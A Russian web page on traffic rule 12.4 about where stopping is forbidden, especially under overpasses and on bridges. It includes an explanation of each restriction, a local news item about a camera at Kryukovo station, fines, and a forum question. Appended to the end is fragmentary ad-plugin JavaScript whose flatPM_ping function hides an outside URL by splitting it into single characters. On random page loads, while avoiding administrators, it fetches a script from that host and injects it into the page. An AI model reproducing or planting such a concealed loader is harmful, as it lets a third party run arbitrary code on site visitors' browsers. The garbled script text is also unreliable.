Остановка под эстакадой

12.4 Остановка запрещена

12.4. Остановка запрещается:

  • на трамвайных путях, а также в непосредственной близости от них, если это создаст помехи движению трамваев;
  • на железнодорожных переездах, в тоннелях, а также на эстакадах, мостах, путепроводах (если для движения в данном направлении имеется менее трех полос) и под ними;
  • в местах, где расстояние между сплошной линией разметки (кроме обозначающей край проезжей части), разделительной полосой или противоположным краем проезжей части и остановившимся транспортным средством менее 3 м;
  • на пешеходных переходах и ближе 5 м перед ними;
  • на проезжей части вблизи опасных поворотов и выпуклых переломов продольного профиля дороги при видимости дороги менее 100 м хотя бы в одном направлении;
  • на пересечении проезжих частей и ближе 5 м от края пересекаемой проезжей части, за исключением стороны напротив бокового проезда трехсторонних пересечений (перекрестков), имеющих сплошную линию разметки или разделительную полосу;
  • ближе 15 метров от мест остановки маршрутных транспортных средств или стоянки легковых такси, обозначенных разметкой 1.17, а при ее отсутствии — от указателя места остановки маршрутных транспортных средств или стоянки легковых такси (кроме остановки для посадки и высадки пассажиров, если это не создаст помех движению маршрутных транспортных средств или транспортных средств, используемых в качестве легкового такси);
  • в местах, где транспортное средство закроет от других водителей сигналы светофора, дорожные знаки, или сделает невозможным движение (въезд или выезд) других транспортных средств, или создаст помехи для движения пешеходов.
  • на полосе для велосипедистов.

Рассмотрим подробно в каких местах запрещена остановка:

Запрещена остановка на трамвайных путях

Это правило дополняет требование общих правил остановки в п.12.1, не нарушив его остановиться на трамвайных путях нельзя, однако если будут созданы помехи движению трамваев за это уже наступает более серьезная ответственность, чем за нарушение общего правила остановки

Запрещена остановка возле трамвайных путей

Остановка возле трамвайных путей без нарушения общих правил возможно только в случае расположения трамвайных путей с краю дороги. Однако, если это создаст помехи движению трамваю это уже будет нарушение схожее по грубости, как и остановка на самих путях.

Запрещена остановка на железнодорожном переезде

Перед переездом и после переезда совершить остановку можно. Но Правила дорожного движения не определяют границы железнодорожного переезда. Принято за границу считать установленные перед переездом знаки 1.3.1 или 1.3.2 , светофор или шлагбаум.

Запрещена остановка в тоннелях

Тоннель тоже не имеет определения в Правилах

Участок въезда в тоннель тоже принято считать частью тоннеля, так как он имеет непосредственное к нему отношение.

Запрещена остановка на эстакадах, мостах, путепроводах и под ними

В этом запрете сразу дано исключение, если в данном направлении более трех полос остановка разрешена. Исключение распространяется только при расположении на этих объектах. Под эстакадами и путепроводами остановка запрещена.

Как и в предыдущих случаях в ПДД отсутствует четкое определение границ этих дорожных сооружений. В каждом случае каждым инспектором и каждым судьей они могут быть определены по-разному. Где по табличке с названием реки, где по ограждениям свойственным мостам, где по началу подъема и так далее.

Запрещена остановка, если интервал меньше 3м до сплошной линии разметки

Запрещена остановка, если интервал меньше 3м до разделительной полосы

Запрещена остановка, если интервал меньше 3м до противоположного края проезжей части

В этом случае следует отметить, что трамвайные пути, расположенные посередине по определению Правил тоже являются одним из краев проезжей части

В ПДД упущен момент, что в одном месте могут одновременно припарковаться два автомобиля, и при этом останется очень узкий проезд, но это не будет считаться нарушением, если возможность проезда сохранилась.

Запрещена остановка на пешеходных переходах и ближе 5 м перед ними

Так как остановка разрешается в том числе и на левой встречной стороне дороги возникает ситуация, что казалось бы можно остановиться на левой стороне, проехав пешеходный переход. Такое трактование не верно. «Перед пешеходным переходом» следует трактовать относительно предназначенного направления движения по полосе, а не фактического направления движения автомобиля. Это и логично и безопасно.

Запрещена остановка на проезжей части при видимости дороги менее 100 метров

Не будет нарушением, если остановка будет совершена на обочине. Запрет распространяется только на случай остановки на проезжей части.

Запрещена остановка на пересечении проезжих частей и ближе 5 м от края пересекаемой проезжей части

Еще один случай отсутствия возможности однозначного определения границ. Пересечение проезжих частей не имеет определения в ПДД. Принято определять границы по мнимым линиям продолжения границ каждой из проезжих частей. Тем не менее технические закругления проезжих частей, тоже относятся к перекрестку и предназначены для движения транспортных средств, соответственно являются также проезжей частью и входят в зону пересечения проезжих частей. Линия пересекаемой проезжей части остается при этом прямой.

Исключение составляют пересечения на Т-образных перекрестках при условии наличия сплошной линии разметки или разделительной полосы

Запрещена остановка в местах остановки маршрутных транспортных средств

Если место остановки обозначено разметкой 1.17, остановка запрещена ближе 15 метров до и после разметки.

Если место остановки обозначено знаком 5.17 или 5.18 , то зона запрета находится на расстоянии 15 метров до и после знака.

Исключение составляет остановка для посадки или высадки пассажиров, при этом не должно быть создано помех маршрутным транспортным средствам или легковым такси

Если место остановки знаком и/или разметкой не обозначено, остановка разрешена.

Не запрещена остановка на противоположной стороне дороги напротив места остановки, даже если ширина дороги менее 15 метров.

Запрещена остановка в местах стоянки легковых такси

Одно из нововведений в Правила дорожного движения в 2013 году. Места стоянки такси помимо знака 5.18 могут быть тоже обозначены разметкой 1.17 и в этих местах действует запрет остановки с такими же условиями, как и в местах остановки маршрутных транспортных средств.

Запрещена остановка, если будут закрыты знаки или сигналы светофора

Запрещена остановка, если это сделает невозможным движение других транспортных средств

В этом случае рассматривается не создание помех, а отсутствие возможности движения других транспортных средств, то есть даже если других транспортных средств нет и помехи созданы не будут, такая остановка все равно запрещена.

Запрещена остановка, если будут созданы помехи пешеходам

В этом случае разрешено остановится на пути возможного движения пешеходов, если при этом не будут созданы им помехи.

Запрещена остановка, на полосе для велосипедистов

Если на проезжей расположена полоса для велосипедистов остановка на стороне этой полосы запрещена

Что делать, если инспектор останавливает в месте, где остановка запрещена?

Представим себе ситуацию: водитель, двигающийся по дороге, видит инспектора, подающего ему сигнал остановки, но при этом дорожный знак или разметка остановку в указанном месте запрещают. Можно ли останавливаться по требованию инспектора, и не может ли он выписать штраф за совершенное нарушение ПДД?

Места, в которых запрещена остановка (а следовательно, и стоянка) четко регламентированы ПДД. Согласно пункту 12.4 Правил, остановка запрещается :

  • на трамвайных путях, а также в непосредственной близости от них, если это создаст помехи движению трамваев;
  • на железнодорожных переездах, в тоннелях, а также на эстакадах, мостах, путепроводах (если для движения в данном направлении имеется менее трех полос) и под ними;
  • в местах, где расстояние между сплошной линией разметки (кроме обозначающей край проезжей части), разделительной полосой или противоположным краем проезжей части и остановившимся транспортным средством менее 3 м;
  • на пешеходных переходах и ближе 5 м перед ними;
  • на проезжей части вблизи опасных поворотов и выпуклых переломов продольного профиля дороги при видимости дороги менее 100 м хотя бы в одном направлении;
  • на пересечении проезжих частей и ближе 5 м от края пересекаемой проезжей части, за исключением стороны напротив бокового проезда трехсторонних пересечений (перекрестков), имеющих сплошную линию разметки или разделительную полосу;
  • ближе 15 метров от мест остановки маршрутных транспортных средств или стоянки легковых такси, обозначенных разметкой 1.17, а при ее отсутствии — от указателя места остановки маршрутных транспортных средств или стоянки легковых такси (кроме остановки для посадки и высадки пассажиров, если это не создаст помех движению маршрутных транспортных средств или транспортных средств, используемых в качестве легкового такси);
  • в местах, где транспортное средство закроет от других водителей сигналы светофора, дорожные знаки или сделает невозможным движение (въезд или выезд) других транспортных средств, или создаст помехи для движения пешеходов;
  • на полосе для велосипедистов.

Кроме того, остановка запрещена на участках дороги, имеющих разметку 1.4 : согласно новому ГОСТ Р 51256-2018 это сплошная одиночная линия желтого цвета, расположенная вдоль края проезжей части.

В перечисленных выше выдержках из Правил мы выделили те требования, нарушения которых водитель не может избежать при остановке инспектором . К примеру, если сотрудник ГИБДД расположился перед пешеходным переходом, то остановиться стоит за «зеброй», чтобы не нарушать ПДД. А вот если инспектор останавливает водителя на участке дороги с ограниченной видимостью, узкой проезжей частью или желтой разметкой 1.4, выполнить его требование, не нарушив правила, фактически невозможно. Но законно ли это, и не может ли инспектор выписать штраф за совершенное по его же указанию нарушение?

Инспектор действительно может остановить водителя в месте, где запрещена остановка, однако для этого должны быть веские основания. Пункт 88 административного регламента ГИБДД уточняет, что «не допускается останавливать транспортные средства на участках дорог, где их остановка запрещена правилами дорожного движения, за исключением случаев, когда такая остановка связана с необходимостью пресечения преступления, административного правонарушения, осуществления распорядительно-регулировочных действий, предотвращения реальной угрозы причинения вреда жизни, здоровью и (или) имуществу участников дорожного движения, а также случаев обозначения места остановки патрульным автомобилем с включенными специальными световыми сигналами, другими средствами регулирования и организации дорожного движения».

Проще говоря, сотрудник ГИБДД может остановить водителя, если впереди, к примеру, произошло ДТП в условиях ограниченной видимости или имеется другая потенциально опасная ситуация, или же если место остановки обозначено патрульной машиной с включенной «мигалкой».

А вот наказать водителя за нарушение правил при остановке по собственному требованию в запрещенном месте инспектор не может . Дело в том, что вся ответственность за происходящее в случае остановки им автомобиля в «запретной зоне» полностью ложится на его плечи. Тот же пункт 88 регламента указывает, что «в случае необходимости остановки транспортных средств в местах, где их остановка запрещена правилами дорожного движения, сотрудником принимаются меры по обеспечению безопасности дорожного движения в данном месте». Поэтому останавливаться по требованию инспектора на таких участках дорог можно смело, при этом выполняя его указания по обеспечению безопасности.

Камера начала штрафовать за остановку под эстакадой у станции Крюково

Полгода назад городские власти обещали разрешить высаживать пассажиров под Крюковской эстакадой в «старом городе», но вместо этого установили там камеру, фиксирующую нарушения.

Камера на Крюковской площади, направленная на участок под эстакадой, на котором установлен знак «Остановка запрещена», начала работать около двух недель назад, рассказал Инфопорталу источник в транспортной сфере. Причем камера фиксирует именно остановку в зоне действия знака, а не только стоянку, как парконы, работавшие там и ранее. Размер штрафа за это правонарушение составляет 3 тысячи рублей.

Примечательно, что в апреле этого года комиссия префектуры Зеленограда по безопасности дорожного движения приняла решение, напротив, разрешить автомобилистам высаживать пассажиров под эстакадой у станции Крюково в «старом городе», для чего там планировалось заменить знак «Остановка запрещена» на «Стоянка запрещена» и переделать разметку. Внести изменения в организацию дорожного движения в этом месте должны были до 15 октября, однако этого не произошло.

Другой источник в транспортных кругах сообщил Инфопорталу, что на самом деле власти не собирались разрешать остановку под эстакадой, так как это запрещено пунктом 12.4 ПДД, и решение об изменениях касалось участка от эстакады до существующей парковочной зоны на Крюковской площади (хотя в протоколе заседания комиссии однозначно говорится о пространстве «под эстакадой»). По словам источника, реализовать изменения планировалось в рамках запланированного на этот год текущего ремонта на Крюковской площади. Однако из-за того, что площадь включили в границы благоустройства Панфиловского проспекта, намеченного на 2020 год, текущий ремонт у станции Крюково отменили. Отметим, что теперь и основная часть работ по благоустройству Панфиловского проспекта перенесена на более поздний срок — 2021 год.

Штраф за остановку на мосту

Согласно ПДД, водители не имеют права останавливаться на путепроводах. В 2019 году предусмотрен штраф за остановку на мосту, который можно получить, если нарушение будет зафиксировано камерами или инспектором ГИБДД. Однако есть некоторые исключения, о которых будет рассказано далее.

Почему запрещено останавливаться на мосту?

Мост – это специальное сооружение, возводящееся в местах над водными преградами, если нет альтернативных способов проезда. Если же под ним находятся железнодорожные пути и другие сухопутные объекты, сооружение носит название путепровода. Однако в обоих случаях останавливаться на них запрещено, если количество полос попутного движения ниже трех.

Существует несколько причин, по которым ПДД накладывает запрет на остановку на мостах и путепроводах:

  • Ограниченное пространство. Если полос менее трех, это создаст определенные неудобства другим водителям и станет причиной образования пробки. Кроме того, остановка на таком участке дороги существенно повышает риск возникновения ДТП. Если же полос более трех, водитель может остановиться в крайней правой на период до 5 минут, затем продолжить движение. Наказываться по КоАП РФ это не будет. Если же транспортное средство стоит на дороге более 5 минут, это считается уже не остановкой, а стоянкой, и автовладельца могут оштрафовать;
  • Повышение давления на опоры моста. Мост считается сложной конструкцией, рассчитанной на определенный поток транспортных средств. Перед въездом на него могут быть запрещающие знаки, ограничивающие движение автомобилей массой в несколько тонн. Если же давление повышается, это уменьшает срок службы элементов конструкции.

Есть еще и другой фактор, связанный непосредственно с безопасностью участников движения: если из-за стоящего на мосту автомобиля произойдет ДТП и в него врежется другая машина на высокой скорости, шансы выжить у людей будут минимальны. Одно из транспортных средств может перелететь через ограничивающие конструкции и приземлиться с большой высоты уже внизу.

Когда останавливаться можно?

Существует несколько ситуаций, в которых останавливаться на мосту все же можно:

Уважаемый посетитель!

Если у Вас возникают вопросы, Вы можете бесплатно задать их юристу по телефонам.

Наш юрист БЕСПЛАТНО Вас проконсультирует.

  • Если на нем более трех полос движения в попутном направлении. Встав в крайней правой, водитель вряд ли создаст сильные неудобства другим участникам: скорее всего, они будут минимальны;
  • Если этого требует инспектор ГИБДД. В таких случаях запреты отменяются, необходимо выполнить требования сотрудника дорожной полиции;
  • Если автомобиль сломался в пути. Здесь от водителя уже мало что зависит, но, согласно ПДД, он должен разместить знак аварийной остановки и предпринять все меры по устранению препятствия для других участников как можно быстрее.

Какие знаки устанавливаются на мостах и перед ними?

Помимо запрета остановки на мостах по ПДД, перед въездами на них может устанавливаться запрещающий знак 3.27.

Также нередко встречаются другие ограничительные таблички:

  • 3.11. Распространяется на автомобили с определенной массой, чаще всего запрещает движение большегрузов;
  • 1.9. Обозначает разводной мост, оборудованный пролетными элементами для пропуска водных судов;
  • 1.29. Означает сильный боковой ветер. Ничего не запрещает, но устанавливается для повышения внимательности и осторожности водителей.

Размер штрафа за остановку на мосту

Согласно ст. 12.19 КоАП РФ, размер штрафа за остановку на мосту или путепроводе составляет 500 руб. Если же нарушение доставило неудобства другим водителям, виновного автовладельца могут привлечь по ч. 4 ст. 12.19 и обязать уплачивать штраф уже в 2 000 руб.

ПДД 12.4 остановка под эстакадой

Опции темы
Поиск по теме

ПДД 12.4 остановка под эстакадой

Зеленоград (если кто знает, у жд станции крюково), эстакада. Под эстакадой — парковка (знак Р, разметка), односторонний рукав для разворота машин в 2 полосы, стоянка автобусов. Рукав, 2 полосы, справа стоит знак «остановка запрещена». Изобразил на схеме.
Эстакада у станции, вечером все забито встречающими. Иногда вечерами менты гоняют тех, кто кто ставит машины на правой стороне в зоне знака «остановка запрещена». Остановился в рукаве слева, благо было свободное место, а парковка забита. Подходит ко мне, «почему нарушаем?» Отвечаю — знак «остановка запр» действует на прав. сторону, я стою слева. Отвечает «все равно, под эстакадой нельзя». Я киваю на парковку, спрашиваю — а на парковке можно? Она ведь тоже под эстакадой? На парковке, говорит, можно, т.к. там знак «Р», а тут нельзя..

Читаю п 12.4 «Остановка запрещена на железнодорожных переездах, в тоннелях, а также на эстакадах, мостах, путепроводах (если для движения в данном направлении имеется менее трех полос) и под ними».

Вопрос:
Исходя из каких соображений запрещена остановка под эстакадой, если парковки под ними организовывать можно? Объяснение гайца «можно только там, где Р» не нравится, ведь «разрешено, что не запрещено», а не «запрещено все, что не разрешено». Ставили бы тогда уже знак «остановка запрещена» на обе стороны, либо не ставили бы вообще, раз все-равно «под эстакадой нельзя»

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}